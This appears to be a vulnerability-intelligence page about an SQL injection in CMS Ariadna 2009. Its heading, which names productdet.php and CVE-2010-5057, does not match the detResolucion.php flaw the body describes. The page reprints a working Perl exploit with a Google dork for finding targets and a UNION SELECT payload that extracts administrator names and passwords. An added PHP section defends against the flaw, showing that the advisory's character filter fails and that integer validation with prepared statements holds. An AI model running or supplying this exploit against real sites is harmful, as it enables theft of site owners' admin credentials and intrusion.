
65 id productdet.php_CVE-2010-5057 CMS Ariadna ‘detResolucion.php’ SQL injection vulnerability - vulnerability intelligence, vulnerability details, security vulnerabilities, CVE - 安全客 (Anquanke),...

包沈义
2023-12-01

# Exploit Title : CMS Ariadna 2009 SQL Injection

# Date : 2010-04-19

# Author : Andrés Gómez

# Contact : gomezandres@adinet.com.uy

# Dork : "allinurl: detResolucion.php?tipodoc_id="

########################################################################

Exploit in Perl Start In Next Line:

use LWP::Simple;

########################################################################

# Malicious users may inject SQL queries into a vulnerable

# application to fool a user in order to gather data from them or see

# sensitive information.

########################################################################

# Solution:

# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);

# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);

########################################################################

# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi

##########################[Andrés Gómez]#################################

my $target = $ARGV[0];

unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &

Security-Pentest -- Andres Gomez\n\n";

print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";

print "\nEjemplo Ejecucion = AriadnaCms.pl

http://www.sitio.extension/path/\n" ; exit 1; }

$sql =

"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";

$final = $target.$sql;

$contenido = get($final);

print "\n\n[+] Pagina Web: $target\n\n";

if ($contenido =~/security(.*):pentest(.*)/) {

print "[-] Datos extraidos con exito:\n\n";

print "[+] Usuario = $1\n";

print "[+] Password = $2\n";

} else {

print "[-] No se obtuvieron datos\n\n";

exit 1;

}

print "\n[ñ] Escriba exit para salir de la aplicacion\n";

exit 1;
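
An added example, not part of the original advisory or of CMS Ariadna: the `preg_replace` filter from the Solution section next to stricter handling of `tipodoc_id`, which the request in the script uses as a number. It assumes PHP with the `pdo_sqlite` extension; the `resolucion` table, its columns and the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// The advisory's filter applied to a single value: it removes every character
// that is not a word character, whitespace or a single quote.
function advisory_filter(string $value): string
{
    return preg_replace("|([^\w\s\'])|i", '', $value) ?? '';
}

// Stricter handling for a numeric id: accept 1-9 ASCII digits, nothing else.
function parse_id(string $value): ?int
{
    return preg_match('/\A[0-9]{1,9}\z/', $value) === 1 ? (int) $value : null;
}

// Look up rows for a validated id with a bound parameter; invalid input is
// rejected rather than "cleaned".
function find_resolucion(PDO $db, string $raw): array
{
    $id = parse_id($raw);
    if ($id === null) {
        return [];
    }
    $stmt = $db->prepare('SELECT titulo FROM resolucion WHERE tipodoc_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed in-memory database; the "resolucion" table is hypothetical.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE resolucion (tipodoc_id INTEGER, titulo TEXT)');
$db->exec("INSERT INTO resolucion VALUES (33, 'Constructed sample row')");

// The tipodoc_id value from the script above, URL-decoded ("+" becomes a space).
$sample = urldecode('33+and+1=0+union+select+concat(0x7365637572697479,'
    . 'adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--');

$filtered = advisory_filter($sample);
echo "after advisory filter: {$filtered}\n";
echo 'filtered value is an integer: ', var_export(parse_id($filtered) !== null, true), "\n";
echo 'rows for raw sample: ', count(find_resolucion($db, $sample)), "\n";
echo 'rows for "33": ', count(find_resolucion($db, '33')), "\n";
```

The filter only strips punctuation, so the filtered value still contains words such as `union` and `select` and is still not an integer. Validating the parameter as an integer and binding it in a prepared statement does not depend on which characters were stripped.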
